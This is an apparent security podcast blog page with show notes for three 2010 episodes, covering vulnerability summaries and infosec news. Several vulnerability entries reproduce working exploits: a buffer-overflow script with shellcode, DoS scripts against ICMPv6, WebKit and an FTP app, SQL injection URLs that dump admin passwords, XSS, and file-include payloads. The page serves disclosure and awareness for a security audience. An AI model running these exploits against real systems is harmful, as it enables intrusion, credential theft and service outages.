Your daily source of Pwnage, Policy and Politics.

Episode 76 – Don’t Spy on Me!

Play

ISD Podcast Episode 76 for February 26, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

OuterZ0ne:

  • Outerz0ne March 19th and 20th near the Atlanta airport. Here’s their site for more info: http://www.outerz0ne.org/
  • Starts early Saturday morning at the Wellseley Inn Atlanta Airport Hotel (http://www.wellesleyinnatlanta.com) 1377 Virginia Avenue, Atlanta, GA 30344 (404) 762-5111
  • The next DC404 meeting will be at Outerz0one

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs, GA starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538).

Friends of the Podcast:
Webhosting services:WebSpeedway

Vulnerabilities of Interest:

  1. Microsoft Windows TCP/IP ICMPv6 Router protocol implementation is subject to a remote code-execution vulnerability. An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will completely compromise affected computers. Failed exploit attempts will likely result in denial-of-service conditions. The following commands using the Scapy6 packet manipulation program can trigger this issue and cause a denial-of-service condition:v6_dst = “<IPv6 address>”

    mac_dst = “<Mac address>”

    pkt = IPv6(dst=v6_dst, hlim=255) / IPv6ExtHdrFragment() / ICMPv6ND_RA() / ICMPv6NDOptPrefixInfo(len=255, prefixlen=64, prefix=”2001::”) / Raw(load=’A'*2008)

    l=fragment6(pkt, 1500)

    for p in l:
    sendp(Ether(dst=mac_dst)/p, iface=”eth0″)

  2. GNU Libtool is subject to a local privilege-escalation vulnerability. Local attackers can exploit this issue to execute arbitrary code with superuser privileges. Successful exploits will result in the complete compromise of affected computers. Versions prior to Libtool 2.2.6b are vulnerable. An attacker can exploit this issue by enticing an unsuspecting administrator to run ‘libtool’ from the directory where a malicious module is stored.
  3. The APC Network Management Card is subject to multiple cross-site request-forgery and cross-site scripting vulnerabilities. An attacker can exploit the cross-site request forgery issues to alter the settings on affected devices, which may lead to further network-based attacks. The attacker can exploit the cross-site scripting issues to execute arbitrary script code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials. Other attacks are also possible. Versions prior to the following are vulnerable:
    Network Management Card Firmware 3.7.2 and Network Management Card Firmware 5.1.1. To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URL: http://www.sample.com/Forms/login1?login_username=<ScRiPt>alert('hello');</ScRiPt>
  4. WorkSimple is subject to a shell upload and password disclosure vulnerability.  Version 1.3.2 is vulnerable, though other versions may be as well.  Exploit code is available:
    Password Disclosure Vulnerability:

    http://www.sample.com/Path/data/secret.php

    Remote File Upload Vulnerability:
    file :/modules/uploader.php?startupload
    array(“.phps”,”.txt”,”.html”,”.png”
    , “.html”, “.htm”,”.jpg”,”.png”,
    “.bmp”,”.c”,”.cpp”, “.css”,
    “.h”, “.gif”, “.torrent”,
    “.jpeg”);

    <form enctype=’multipart/form-data’
    action=’[SITE]/modules/uploader.php?startupload’ method=’post’>
    <input type=’hidden’ name=’MAX_FILE_SIZE’ value=’500000′ />
    Upload a file: <input name=’uploadedfile’ size=’14′ type=’file’ />
    <BR><BR>
    <input class=’button’ type=’submit’ value=’upload’ />
    </form>

Stories of Interest:
News item 1: http://www.technologyreview.com/computing/24632/?a=f
Researchers at SRI International and Georgia Tech are preparing to release a free tool to stop “drive-by” downloads: Internet attacks in which the mere act of visiting a Web site results in the surreptitious installation of malicious software. The new tool, called BLADE (Block All Drive-By Download Exploits), stops downloads that are initiated without the user’s consent.

In the fourth quarter of 2009, roughly 5.5 million Web pages contained software designed to foist unwanted installs on visitors, according to Dasient, a firm that helps protect websites from Web-based malware attacks. Such drive-by downloads target computers that are not up-to-date with the latest security patches for common Web browser vulnerabilities, or are missing security updates for key browser plug-ins, such as Adobe’s PDF Reader and Flash Player. Attackers use software called exploit packs, which probe the visitor’s browser for known security holes.
The research group has been putting BLADE through the paces since January, exposing a few virtual desktops equipped with the software to new exploit sites identified each day by security experts. Each malicious URL is tested against multiple software configurations covering different browser versions and common plug-ins.

News item 2: http://sanfrancisco.bizjournals.com/sanfrancisco/stories/2010/02/22/daily2.html

VeriSign Inc. said 11 million new domain names were registered in the fourth quarter of 2009, pushing the total number to 192 million at year’s end. At the end of the third quarter, there were 187 million registered domain names. That was up from 177 million at the end of 2008. That works out to about 3.7 million new registrations per month in the fourth quarter, the Mountain View business, which tracks such things, said. New registrations for the .com and .net domains were about 2.4 million per month in the fourth quarter.

The renewal rate in the fourth quarter was 71 percent, about the same as it was in the fourth quarter of 2008. At the end of 2009, domain name registrations were up 15 million from the end of 2008.

News item 3: http://www.virusbtn.com/news/2010/02_22.xml
Despite widespread calls to boycott IE 6 and Microsoft’s plans to retire support for the browser, 19% of respondents in a Virus Bulletin poll said that they are still running the browser, whether at home, at work, or both. In VB’s poll, 15% of respondents said they were running the browser at work, indicating that, for many organizations, upgrading is not a priority.
http://www.virusbtn.com/news/polls/index?id=43

Are you still running IE 6?

(February 2010)

Yes, on my machine at work
12%

Yes, on my home machine
4%

Yes, on both work and home machines
3%

No, I use a newer version of IE
26%

No, I use a different browser
55%

News item 4: http://www.krebsonsecurity.com/2010/02/n-y-firm-faces-bankruptcy-from-164000-e-banking-loss/
A New York marketing firm that as recently as two weeks ago was preparing to be acquired now is facing bankruptcy from a computer virus infection that cost the company more than $164,000.

Karen McCarthy, owner of Merrick, N.Y. based Little & King LLC, a small promotions company, discovered on Monday, Feb. 15 that her firm’s bank account had been emptied the previous Friday. McCarthy said she immediately called her bank – Cherry Hill, N.J. based TD Bank – and learned that between Feb. 10 and Feb. 12, unknown thieves had made five wire transfers out of the account to two individuals and two companies with whom the McCarthys had never had any prior business.

“She was told to go to the branch next day, and she did, and the people at the branch were very nice, apologetic, and said, ‘Whatever happened, we’ll replace it,’” Karen McCarthy’s husband Craig said. “She called them up on Wednesday, and they gave her the runaround. Then she finally got to talk to someone and they said ‘We don’t see the error on our side.’”

Immediately before the fraud occurred, Mrs. McCarthy found that her Windows PC would no longer boot, and that the computer complained it could not find vital operating system files. “She was using it one day and then this blue screen of death just came on her screen,” said a longtime friend who was helping McCarthy triage her computer.

Later, McCarthy’s friend would confirm that her system had been infected with the ZeuS Trojan, a potent family of malware that steals passwords and lets cyber thieves control the infected host from afar. ZeuS also includes a feature called “kill operating system,” which criminals have used in prior bank heists to effectively keep the victim offline and buy themselves time to make off with the cash.

News item 5: http://www.myanmarnews.net/story/605416
A Latvian computer hacker has been leaking secret bank details to a local TV station. In Riga, data about the finances of banks and state-owned firms has been shown on Latvian TV, thanks to the hacker who uses the alias “Neo.” With Latvia suffering badly in the global recession, Neo has claimed he wants to expose those cashing in on the recession in Latvia, and has already revealed embarrassing pay details of bank managers and leading Latvian firms. So far, he has managed to leak the pay details of managers from one Latvian bank that received a bail-out, revealing they did not take salary cuts as promised. Other data shows that state-owned companies secretly awarded bonuses when still requesting help from the government. While police are now looking for the hacker, who has committed computer crime, the public appears to be generally on his side, as he continues to disclose embarrassing information.

News item 6:  http://blogs.technet.com/microsoft_blog/archive/2010/02/25/cracking-down-on-botnets.aspx

Waledac, has been stopped in its tracks after Microsoft got a court to issue a secret temporary restraining order. The restraining order took 277 domain names used by the criminals to communicate with the botnet offline. Without these domain names, it is hoped that the controllers of the botnet will permanently lose access to the machines running their malware.

The Waledac botnet is presumed to be run by Eastern Europeans and to be made up of hundreds of thousands of compromised machines. It sends hundreds of millions, if not billions, of e-mails each day, as well as distributes malware to help recruit new machines to the network. Microsoft’s complaint describes in detail how the botnet is organized, with a complex hierarchical control system. At the root of the system is the command-and-control servers. The botnet uses the 277 domain names to connect to the command and control servers to download new commands. These commands are then distributed through the different tiers of the network using peer-to-peer transmission.

News item 7: http://www.computerworld.com/s/article/9162498/Researchers_question_Microsoft_s_botnet_take_down?source=rss_news

A prominent security researcher today said he doubts Microsoft’s take-down of the Waledac botnet would have any impact on spam levels, as the company claimed.

“Waledac just is not a hugely prolific spammer,” said Joe Stewart, director of malware analysis at SecureWorks and a noted botnet researcher. “So I don’t think it’s going to affect spam [volume]. What it does do lately…, what it’s used for, is to install rogue antivirus software.”

The U.K.-based anti-spam service Spamhaus echoed Stewart today. “If [Microsoft's take-down] did affect spam, we haven’t noticed,” said Richard Cox, the chief information officer at Spamhaus. Like Stewart, Cox also dismissed Waledac’s threat as a spam engine.

News item 8:  http://www.newsnet5.com/dpp/news/national/Copy_of_PATeen-Hacker_98726384

A 17-year-old honor student from western Pennsylvania has entered the equivalent of a guilty plea to four felony charges in juvenile court for using a computer virus to crash a Sony Entertainment Corp. gaming Web site.

The charges grew out of a federal grand jury investigation in San Diego, but authorities agreed to let the charges be handled by Westmoreland County Juvenile Court because of the boy’s age.

Police in Greensburg, Pa. said the boy used his computer skills to cripple Sony’s PlayStation site for 11 days in November 2008 after he was barred from it for cheating while playing a war game against others online.

News item 9:  http://www.wired.com/threatlevel/2010/02/military-spied-on-plannet-parenthood/

The U.S. military monitored Planned Parenthood and a white supremacist group as part of the government’s security preparations for the 2002 Olympics in Utah, according to new documents released by the Department of Defense.

The U.S. Joint Forces Command liaison collected and disseminated information on U.S. citizens who were members of Planned Parenthood and the white supremacist group National Alliance regarding their involvement in protests and distributing literature, according to an intelligence-oversight report released by the Pentagon. The documents indicate that the JFC liaison was working with the FBI’s Olympic Intelligence Center at the time.

This and other intelligence-activity disclosures appear in heavily redacted documents that were released to the Electronic Frontier Foundation. They came in response to an ongoing Freedom of Information Act project the organization is conducting to obtain oversight information from intelligence agencies.

EFF received more than 800 pages from intelligence oversight reports created by the Defense Department inspector general that examine actions, conducted by various branches of the department, that are believed to be illegal.
A document from a 2008 oversight report indicates that Army Cyber Counterintelligence officers attended a Black Hat security conference without disclosing their Army affiliation. The conference, held annually in Las Vegas and Washington, D.C., attracts hackers and security professionals from around the world. It’s also a hotbed gathering for undercover law enforcement and intelligence agents from around the world who come to learn about the latest computer security vulnerabilities and what specific hackers are up to. The documents don’t indicate if the officers collected any information on conference attendees.

News item 10: http://cellphones.org/privacy/

Posted | Comments Off

Read More

Episode 75 – “Zipit, Zipit Good”

Play

ISD Podcast Episode 75 for February 25, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

Friends of the Podcast:
Webhosting services:WebSpeedway

Vulnerabilities of Interest:

  1. WebKit is subject to a remote memory-corruption vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition. The following are vulnerable: Apple Safari 4.0.4, Apple Safari for the iPhone and iPod Touch and Google Chrome 4.0.249. Other versions of those browsers or other applications built using WebKit may also be affected.
    #!/usr/bin/python
    #greetz to my blackhatz and baycatz
    #iPhone CSS::Selector crash
    #this Python script acts as a web server and sends a malformed long string to the CSS <style> tag
    #this is a remote crash bug, hoever an analysis of the debug dump shows remote code execution capability, I am just lazy

    import sys, socket;

    def main():
    junk = “*>” * 120000;

    html = “”"
    <html>
    <head>
    <style>
    “”";

    html += junk;

    html += “”"
    body {background: blue;}
    </style>
    </head>
    </html>
    “”";

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
    s.bind((”,2121));
    s.listen(1);

    while True:
    channel, details = s.accept();
    print channel.recv(1024);
    channel.send(html);
    channel.close();

    main();

  2. OpenInferno OI.Blogs is subject to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. OpenInferno OI.Blogs 1.0.0 is vulnerable; other versions may also be affected.  Example URLs are available:

    http://www.sample.com/templates/loadStyles.php?theme=file%00

    http://www.sample.com/sources/javascript/loadScripts.php?scripts=[file]%00

    The following example data is available:
    javascript:document.cookie=”installerFile=[FIle];path=’/upload/admin/plugins’

  3. Softbiz Auktios is subject to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Attackers can use a browser to exploit this issue. The following example URLs are available: http://www.sample.com/auktionscript/view_items.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,concat(admin_name,0x3a,pwd),12,13,14,15,16,17,18+from+sbauctions_admin

    http://www.sample.com/auktionscript/store_info.php?id=null+union+select+1,2,3

    ,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(admin_name,0x3a,pwd),18+from+sbauctions_admin#

  4. EMC HomeBase Server is subject to a remote code-execution vulnerability because it fails to properly sanitize user-supplied data. An attacker can exploit this issue to overwrite arbitrary files and execute arbitrary code with the privileges of the service. Attackers can use standard tools to exploit this issue.
  5. SavySoda WiFiFTP is subject to a remote denial-of-service vulnerability. Successful exploits may allow an attacker to prevent users from accessing files on the FTP server, resulting in a denial-of-service condition. SavySoda WiFiFTP 1 is vulnerable; other versions may also be affected.#!/usr/bin/python
    #
    # Title: iPhone – FTP Server (WiFi FTP) by SavySoda DoS/PoC
    # Date: 02-18-2010
    # Author: b0telh0
    # Link: app store (http://itunes.apple.com/br/app/ftp-server/id346724641?mt=8)
    # Tested on: iPhone 3G (firmware 3.1.3)

    # The server doesn’t crash at all, but after exploiting it
    # you can’t see (list) your files anymore. You must to close the app
    # and open it again. Then you’ll see that the app starts like it was
    # fresh installed and your files are gone.

    # root@bt:~# ./free_ftp.py 192.168.1.108
    #
    # [+] iPhone – FTP Server by SavySoda(WiFi FTP).
    # [+] Free version of WiFi FTP with Ad Support.
    #
    # [+] Connecting…
    # [+] 220 Service ready.
    #
    # [+] Sending username…
    # [+] Sending buffer…
    # [+] done!

    # root@bt:~# ftp 192.168.1.108
    # Connected to 192.168.1.108.
    # 220 Service ready.
    # Name (192.168.1.108:root): anonymous
    # 230 User logged in, proceed.
    # Remote system type is UNIX.
    # Using binary mode to transfer files.
    # ftp> ls
    # 200 Command okay.
    # 450 Requested file action not taken. File unavailable (e.g., file busy).
    # ftp> ls
    # 421 Service not available, closing control connection.
    # ftp> ls
    # Not connected.
    # ftp> bye

    import socket
    import sys
    import time

    crash = “\x41″ * 1000

    def Usage():
    print (“Usage: ./free_ftp.py serv_ip\n”)
    if len(sys.argv) <> 2:
    Usage()
    sys.exit(1)
    else:
    host = sys.argv[1]
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
    print “\n[+] FTP Server by SavySoda(WiFi FTP).”
    print “[+] Free version of WiFi FTP with Ad Support.\n”
    print “[+] Connecting…”
    s.connect((host, 21))
    b=s.recv(1024)
    print “[+] ” +b
    except:
    print (“[-] Can’t connect to ftp server!\n”)
    sys.exit(1)
    print “[+] Sending username…”
    time.sleep(3)
    s.send(‘USER anonymous\r\n’)
    s.recv(1024)
    print “[+] Sending buffer…”
    time.sleep(3)
    s.send(‘APPE ‘ + crash + ‘\r\n’)
    s.recv(1024)
    s.close()
    print “[+] done!\n”
    sys.exit(0);

  6. Squid Web Proxy Cache is subject to a remote denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. An attacker may use readily available networking tools to exploit this issue.
  7. WikyBlog is subject to multiple vulnerabilities, including an arbitrary-file-upload issue, a cross-site scripting issue, a remote file-include issue, and a session-fixation issue. Attackers can exploit these issues to run arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials; Upload arbitrary PHP scripts and run them in the context of the webserver; Compromise the application and the underlying system; Hijack a user’s session and gain unauthorized access to the affected application. WikyBlog 1.7.3rc2 is vulnerable; other versions may also be affected. Example URLs are available:
    File upload:
    http://www.sample.com/Wiky/index.php/Attach/(your name)?cmd=uploadform

    Cross-site scripting:

    http://www.sample.com/Wiky/index.php/Special/Main/Templates?cmd=copy&which=<img+src=http://www.example.com/HomeComputer.jpg+onload=alert(213771818860)>

    Session fixation:

    http://www.sample.com/Wiky/index.php/Comment/Main/;jsessionid=indoushkasessionfixation

    http://www.sample.com/Wiky/index.php/Comment/Main/Home_Wiky/;jsessionid=indoushkasessionfixation

    http://www.sample.com/Wiky/index.php/Edit/Main/;jsessionid=indoushkasessionfixation

    Remote file include:

    http://www.sample.com/Wiky/include/WBmap.php?langFile=http://www.example2.com/c.txt?

News Items of Interest:
News item 1:http://www.newsweek.com/id/233916

There is no doubt about the fact that real time or historical tracking of criminals’ movement via their cell phones can come really handy to law enforcement officers. It is certain that most of them – if not all – would like to avail themselves of this opportunity in order to gain helpful information to aid them in their investigations.
According to Newsweek, some of them have. Federal magistrates around the country were asked to sign off on warrants that would allow law enforcement agencies to use cellphones as tracking devices. But, some magistrates in New York, Pennsylvania, and Texas haven’t been that forthcoming and refused to sign such requests, not being convinced about their legality.

http://cryptome.org/isp-spy/microsoft-spy.zip

News item 2: http://news.slashdot.org/story/10/02/21/2329249/Windows-7-Memory-Usage-Critic-Outed-As-Fraud
A few days ago, a report come out alleging that Windows 7 consumed more memory than it should, based on a report from Devil Mountain Software; a followup post linked to Ars Technica’s robust deconstruction of that claim. Now the story gets weird: Fred Flowers writes
The original story quoted the company’s CTO, Craig Barth on the issue. Now, InfoWorld editor in chief Eric Knorr has still more to add. From Knorr’s blog at InfoWorld.com: ‘On Friday, Feb. 19, we discovered that one of our contributors, Randall C. Kennedy, had been misrepresenting himself to other media organizations as Craig Barth, CTO of Devil Mountain Software (aka exo.performance.network), in interviews for a number of stories regarding Windows and other Microsoft software topics. … There is no Craig Barth.’ Knorr’s post goes on to say that Kennedy has been fired from his blogging gig at InfoWorld over this ‘serious breach of trust,’ and that his blog will be removed.”

Technical Segment:
http://www.irongeek.com/i.php?page=security/zipit-z2-hacking-userland-side-track

Posted | Comments Off

Read More

Episode 74 – iBoobs

Play

ISD Podcast Episode 74 for February 24, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

Friends of the Podcast:
Webhosting services:WebSpeedway

Vulnerabilities of Interest:

  1. WordPress is subject to an information-disclosure vulnerability because it fails to properly restrict access to trashed posts. An attacker can exploit this vulnerability to view other authors’ trashed posts, which may aid in further attacks. Versions prior to WordPress 2.9.2 are vulnerable.  The following exploit code is available:
    #/usr/bin/python
    #
    # WordPress > 2.9 Failure to Restrict URL Access PoC
    #
    # This script iterates through the WP post ID’s as an authenticated and unauthenticated user.
    # If the requests differ a ‘Trash’ post has been found.
    #
    # You will need an authenticated user cookie of any priveledge to run this script.
    #
    # Example cookie:
    # wordpress_logged_in_62b3ab14f277d92d3d313662ea0c84e3=test%7C1266245173%7C990157a59700a69edbf133aa22fca1f8
    #
    # Will only work with WP URLs with the ‘/?p={int}’ parameter. Would need to handle redirects (3xx) to handle all URL types.
    #
    #
    # Research/PoC/Advisory By: Tom Mackenzie (tmacuk) and Ryan Dewhurst (ethicalhack3r)

    import httplib

    # Declare vars
    blogURL = “www.example.com”
    userCookie = “enter_cookie_here”
    postID = 0 #Leave at 0

    conn = httplib.HTTPConnection(blogURL)
    Headers = {“Cookie” : userCookie}

    print
    print “Target = http://” + blogURL + “/?p=” + str(postID)
    print

    while 1:

    # Start non authenticated enumeration

    request = ‘/?p=’ + str(postID)
    conn.request(“GET”, request, “”)

    try:
    r1 = conn.getresponse()
    except:
    print “Connection error”

    data1 = r1.read()

    # Start authenticated enumeration

    conn.request(“GET”, request, None, Headers)

    try:
    r2 = conn.getresponse()
    except:
    print “Connection error”

    data2 = r2.read()

    # Compare the HTML body reponses

    if data1 != data2:
    print “+ Found! http://” + blogURL + request
    else:
    print request

    postID += 1

    conn.close()

  2. UplusFtp (formerly Easy Ftp Server) is subject to multiple remote buffer-overflow vulnerabilities. Attackers can exploit these issues to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. UplusFtp 1.7.0.12 is vulnerable; prior versions, including Easy Ftp Server, may also be affected. Exploit code is available:
    #!/usr/bin/python

    # Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF
    # From: The eh?-Team || The Great White Fuzz (we’re not sure yet)
    # Author: dookie2000ca
    # Date: 14/02/2010
    # Found by: loneferret
    # Date Found: 13/02/2010

    # Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip
    # Tested on: Windows XP SP3 Professional

    import socket
    import sys

    # msfpayload windows/exec cmd=calc.exe R | msfencode -b ‘\x00\x0a\x2f\x5c’ -e x86/shikata_ga_nai -t c
    # [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)

    shellcode = (“\xd9\xcc\x31\xc9\xb1\x33\xd9\x74\x24\xf4\x5b\xba\x99\xe4\x93″
    “\x62\x31\x53\x18\x03\x53\x18\x83\xc3\x9d\x06\x66\x9e\x75\x4f”
    “\x89\x5f\x85\x30\x03\xba\xb4\x62\x77\xce\xe4\xb2\xf3\x82\x04″
    “\x38\x51\x37\x9f\x4c\x7e\x38\x28\xfa\x58\x77\xa9\xca\x64\xdb”
    “\x69\x4c\x19\x26\xbd\xae\x20\xe9\xb0\xaf\x65\x14\x3a\xfd\x3e”
    “\x52\xe8\x12\x4a\x26\x30\x12\x9c\x2c\x08\x6c\x99\xf3\xfc\xc6″
    “\xa0\x23\xac\x5d\xea\xdb\xc7\x3a\xcb\xda\x04\x59\x37\x94\x21″
    “\xaa\xc3\x27\xe3\xe2\x2c\x16\xcb\xa9\x12\x96\xc6\xb0\x53\x11″
    “\x38\xc7\xaf\x61\xc5\xd0\x6b\x1b\x11\x54\x6e\xbb\xd2\xce\x4a”
    “\x3d\x37\x88\x19\x31\xfc\xde\x46\x56\x03\x32\xfd\x62\x88\xb5″
    “\xd2\xe2\xca\x91\xf6\xaf\x89\xb8\xaf\x15\x7c\xc4\xb0\xf2\x21″
    “\x60\xba\x11\x36\x12\xe1\x7f\xc9\x96\x9f\x39\xc9\xa8\x9f\x69″
    “\xa1\x99\x14\xe6\xb6\x25\xff\x42\x48\x6c\xa2\xe3\xc0\x29\x36″
    “\xb6\x8d\xc9\xec\xf5\xab\x49\x05\x86\x48\x51\x6c\x83\x15\xd5″
    “\x9c\xf9\x06\xb0\xa2\xae\x27\x91\xc0\x31\xbb\x79\x29\xd7\x3b”
    “\x1b\x35\x1d”)

    sled = “\x90″ * 10
    filler = “\x90″ * 30
    eip = “\x8B\x38\xAB\x71″ # 71AB388B JMP EBP WS2_32.DLL
    trailer = “\x43″ * 48

    evil = sled + shellcode + filler + eip + trailer

    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    connect=s.connect((’192.168.1.142′,21))
    s.recv(1024)
    s.send(‘USER dookie\r\n’)
    s.recv(1024)
    s.send(‘PASS dookie\r\n’)
    s.recv(1024)
    s.send(‘MKD ‘ + evil + ‘\r\n’)
    s.recv(1024)
    s.send(‘QUIT\r\n’)
    s.close

  3. Apache Tomcat is subject to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.  Exploiting this issue allows attackers to delete arbitrary files within the context of the current working directory.  The following versions are affected: Tomcat 5.5.0 through 5.5.28 and Tomcat 6.0.0 through 6.0.20.  An attacker can exploit this issue by deploying a malicious WAR file.
  4. FUSE (Filesystem in Userspace) is subject to a race-condition vulnerability.  A local attacker can exploit this issue to cause a denial of service via symlink attacks involving FUSE shares belonging to privileged users. NOTE: For an exploit to succeed, the attacker must be a member of the ‘fuse’ group. Attackers can use standard commands to exploit this issue.
  5. Todd Miller ‘sudo’ is subject to a local privilege-escalation vulnerability because it fails to correctly handle the ‘sudoedit’ command. Local attackers could exploit this issue to run arbitrary commands as the ‘root’ user. Successful exploits can completely compromise an affected computer. This issue affects ‘sudo’ 1.6.9 through 1.7.2p3.  Local attackers can use readily available commands to exploit this issue.
  6. The Core Design Scriptegrator component for Joomla! is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. Example URL:  http://www.sample.com/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd
  7. PHP is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.  An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. NOTE: In some configurations, attackers may exploit this issue to carry out HTML-injection attacks. Versions prior to PHP 5.2.12 are vulnerable. PHP code is available:
    // overlong UTF-8 sequence
    echo htmlspecialchars(“A\xC0\xAF&”, ENT_QUOTES, ‘UTF-8′);
    // invalid Shift_JIS sequence
    echo htmlspecialchars(“B\x80&”, ENT_QUOTES, ‘Shift_JIS’);
    echo htmlspecialchars(“C\x81\x7f&”, ENT_QUOTES, ‘Shift_JIS’);
    // invalid EUC-JP sequence
    echo htmlspecialchars(“D\x80&”, ENT_QUOTES, ‘EUC-JP’);
    echo htmlspecialchars(“E\xA1\xFF&”, ENT_QUOTES, ‘EUC-JP’);
    echo htmlspecialchars(“F\x8E\xFF&”, ENT_QUOTES, ‘EUC-JP’);
    echo htmlspecialchars(“G\x8F\xA1\xFF&”, ENT_QUOTES, ‘EUC-JP’);

News Items of Interest:
News item 1: http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3213469

Intel was targeted by “sophisticated” attacks last month, about the same time that Google reported its network had been breached, allegedly by Chinese hackers.

In its annual report filed on Monday with the US Securities and Exchange Commission (SEC), Intel confirmed that it had been hit in January.

“We regularly face attempts by others to gain unauthorised access through the internet to our information technology systems by, for example, masquerading as authorised users or surreptitious introduction of software,” read the report. “These attempts, which might be the result of industrial or other espionage, or actions by hackers seeking to harm the company, its products, or end users, are sometimes successful. One recent and sophisticated incident occurred in January 2010 around the same time as the recently publicised security incident reported by Google.”

Intel did not reveal whether the attacks had accessed or stolen confidential company information, an admission that Google made last month when it broke the news that it, and other major Western corporations, had been struck by what it called “highly sophisticated and targeted” attacks.

News item 2: http://www.adobe.com/support/security/bulletins/apsb10-08.html

Adobe has fixed a critical vulnerability in Download Manager for the second time in six weeks.  The program is used to download the company’s two most popular products, Adobe Reader and Flash Player.  The bug, Adobe acknowledged in an advisory, “potentially allow[s] an attacker to download and install unauthorised software onto a user’s system”.

Israeli security researcher Aviv Raff disclosed the vulnerability last week, when he said that attackers could use the Download Manager to forcibly download and install any executable file, including attack code.

“If you go to Adobe’s website to install a security update for Flash, you really expose yourself to a zero-day attack,” Raff said.

Download Manager is not the update mechanism for Reader and Flash Player – that’s called Adobe Updater – but instead oversees file transfers from Adobe’s site

News item 3: http://news.bbc.co.uk/2/hi/business/8533551.stm
The European Commission is looking into complaints about Google’s behaviour, the company has revealed.  The complaints were made by UK price comparison site Foundem, French legal search engine ejustice.fr, and Microsoft’s Ciao.  Google’s senior competition lawyer Julia Holtz said the internet giant was “confident” it operated within European competition law.  Foundem claims that its site is demoted in Google’s search results.  “Foundem… argues that our algorithms demote their site in our results because they are a vertical search engine and so a direct competitor to Google,” Google said.

Foundem founder Shivaun Raff said its problems with Google’s rankings were resolved in December 2009, but it was filing the complaint on behalf of other search firms.

News item 4: http://www.scribd.com/doc/25550091/Proj-Grey-Goose-report-on-Critical-Infrastructure-Attacks-Actors-and-Emerging-Threats
According to Kelly Jackson Higgins, attacks against the power grid are likely to rise and intensify during the next 12 months as smart grid research and pilot projects advance, according to utility security experts and a recently published report that analyzes threats to critical infrastructure.

The so-called Project Grey Goose Report on Critical Infrastructure points to state and/or non-state sponsored hackers from the Russian Federation of Independent States, Turkey, and China as the main threats to targeting and hacking into energy providers and other critical infrastructure networks.

Jeffrey Carr, principal investigator for Project Grey Goose and founder and CEO of GreyLogic, says he and other researchers working on the report initially focused on answering the question of whether there have been any successful cyberattacks on the utilities. “Some companies say there’s never been a successful attack against the grid, but that’s not true,” he says. “There have been at least 120 instances” of successful attacks, some of which are documented in the report and date back to 2001.

Several utility security experts agree that utility security administrators will have their hands full during the next year, as the transition from isolated, closed energy-generation and transmission networks to IP-based and wireless ones begins to take shape in the form of pilot smart grid projects.

News item 5: http://www.scmagazineus.com/ftc-notifies-100-organizations-about-p2p-leaks/article/164288/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+SCMagazineNews+%28SC+Magazine+News%29

The Federal Trade Commission (FTC) said it has identified widespread data leaks from businesses, schools and local governments on peer-to-peer (P2P) file-sharing networks.
As a consequence, the FTC recently alerted nearly 100 organizations whose sensitive information, including personal data about customers and employees, is currently residing on P2P networks. The notices were sent to both private and public organizations ranging in size from eight to tens of thousands of employees.

FTC Chairman Jon Leibowitz said in a statement. “For example, we found health-related information, financial records and drivers’ license and Social Security numbers — the kind of information that could lead to identity theft.”  The FTC on also released educational materials for businesses about the risks of P2P networks and ways to manage them.

News item 6: http://news.cnet.com/8301-13579_3-10457460-37.html?part=rss&subj=news&tag=2547-1_3-0-20
Apple notified developer Chillifresh that its Wobble iBoobs application was being removed from the App Store due to its “overtly sexual” nature. Since then, it appears that Apple has gone on a rampage of sex-oriented app removals.

Chillifresh claimed in a Saturday post that a discussion with Apple revealed that more than 5,000 apps have been affected by its new App Store content policy. Apple said the change was triggered by numerous customer complaints, according to Chillifresh.

Data from iPhone app-tracking Web site AppShopper supports the claim. AppShopper sister site MacRumors on Sunday reported that app removals went from about 100 a day to a high of almost 4,000 on Friday.
Chillifresh said on its Web site that an Apple representative told the developer that under its new App Store policy, it will not accept applications that in any way imply sexual content or include the following:
* images of women in bikinis
* images of men in bikinis
* images of skin
* silhouettes indicating that the app includes sexual images
* sexual connotations or innuendo
* sexually arousing content
